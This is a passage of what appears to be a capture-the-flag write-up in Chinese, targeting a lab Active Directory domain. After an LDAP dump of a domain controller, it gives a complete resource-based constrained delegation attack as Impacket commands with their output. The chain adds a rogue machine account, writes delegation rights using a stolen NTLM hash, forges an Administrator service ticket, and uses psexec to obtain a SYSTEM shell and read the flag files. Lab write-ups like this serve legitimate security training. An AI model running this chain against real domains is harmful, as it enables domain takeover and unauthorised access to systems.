servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/Seerver.shadow.thl; ldap/WIN-QVIKQRQTP3G/SHADOW; HOST/WIN-QVIKQRQTP3G/shadow.thl; ldap/WIN-QVIKQRQTP3G/ForestDnsZones.shadow.thl; HOST/WIN-QVIKQRQTP3G/SHADOW; ldap/SEERVER/ForestDnsZones.shadow.thl; ldap/WIN-QVIKQRQTP3G/DomainDnsZones.shadow.thl; HOST/SEERVER/shadow.thl; ldap/SEERVER/DomainDnsZones.shadow.thl; GC/SEERVER/shadow.thl; ldap/WIN-QVIKQRQTP3G/shadow.thl; GC/WIN-QVIKQRQTP3G/shadow.thl; ldap/SEERVER/shadow.thl; RestrictedKrbHost/WIN-QVIKQRQTP3G; HOST/WIN-QVIKQRQTP3G; ldap/WIN-QVIKQRQTP3G; HOST/SEERVER/SHADOW; ldap/SEERVER/SHADOW; ldap/Seerver.shadow.thl/ForestDnsZones.shadow.thl; ldap/Seerver.shadow.thl/DomainDnsZones.shadow.thl; DNS/Seerver.shadow.thl; GC/Seerver.shadow.thl/shadow.thl; RestrictedKrbHost/Seerver.shadow.thl; RestrictedKrbHost/SEERVER; HOST/Seerver.shadow.thl/SHADOW; HOST/SEERVER; HOST/Seerver.shadow.thl; HOST/Seerver.shadow.thl/shadow.thl; ldap/Seerver.shadow.thl/SHADOW; ldap/SEERVER; ldap/Seerver.shadow.thl; ldap/Seerver.shadow.thl/shadow.thl; RPC/1eb439e6-4337-4d07-8293-605aa7ed7ecb._msdcs.shadow.thl; E3514235-4B06-11D1-AB04-00C04FC2DCD2/1eb439e6-4337-4d07-8293-605aa7ed7ecb/shadow.thl; ldap/1eb439e6-4337-4d07-8293-605aa7ed7ecb._msdcs.shadow.thl
uSNChanged: 61468
uSNCreated: 12293
userAccountControl: SERVER_TRUST_ACCOUNT; TRUSTED_FOR_DELEGATION
userCertificate: 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
whenChanged: 2026-07-12 01:52:50+00:00
whenCreated: 2026-06-15 11:44:02+00:00

接下来打 RBCD, 第一步:添加计算机账户

[/home/kali/temp]$ impacket-addcomputer -computer-name 'ATTACKERPC$' \
  -computer-pass 'P@ssw0rd123!' \
  -dc-host 192.168.237.138 \
  -domain-netbios SHADOW \
  shadow.thl/auditmgr \
  -hashes ':98019215ea3bcb223dacec8fc12a71aa'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account ATTACKERPC$ with password P@ssw0rd123!.

第二步:配置 RBCD

在目标机器的属性中写入一条信任记录

[/home/kali/temp]$ impacket-rbcd -delegate-from 'ATTACKERPC$' \   
  -delegate-to 'SEERVER$' \
  -action 'write' \
  -dc-ip 192.168.237.138 \
  shadow.thl/auditmgr \
  -hashes ':98019215ea3bcb223dacec8fc12a71aa'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACKERPC$ can now impersonate users on SEERVER$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     ATTACKERPC$   (S-1-5-21-2560516159-2044954141-282354372-2601)

第三步:获取服务票据

[/home/kali/temp]$ impacket-getST -spn 'cifs/SEERVER.shadow.thl' \
  -impersonate 'Administrator' \
  -dc-ip 192.168.237.138 \
  shadow.thl/ATTACKERPC$:'P@ssw0rd123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_SEERVER.shadow.thl@SHADOW.THL.ccache

最后走 psexec 拿到 shell

[/home/kali/temp]$ export KRB5CCNAME=/home/kali/temp/Administrator@cifs_SEERVER.shadow.thl@SHADOW.THL.ccache 
[/home/kali/temp]$ impacket-psexec -k -no-pass SEERVER.shadow.thl 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on SEERVER.shadow.thl.....
[*] Found writable share ADMIN$
[*] Uploading file zTKlNsFp.exe
[*] Opening SVCManager on SEERVER.shadow.thl.....
[*] Creating service WMns on SEERVER.shadow.thl.....
[*] Starting service WMns.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami 
nt authority\system

C:\Windows\system32> cd /users/administrator/desktop
 
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is E0CC-0727

 Directory of C:\Users\Administrator\Desktop

06/18/2026  11:11 AM    <DIR>          .
06/18/2026  11:11 AM    <DIR>          ..
06/18/2026  09:50 AM                32 root.txt
06/18/2026  11:15 AM                32 user.txt
               2 File(s)             64 bytes
               2 Dir(s)  49,703,718,912 bytes free

C:\Users\Administrator\Desktop> type user.txt   
0820ef
C:\Users\Administrator\Desktop> type root.txt
3dbef3
C:\Users\Administrator\Desktop>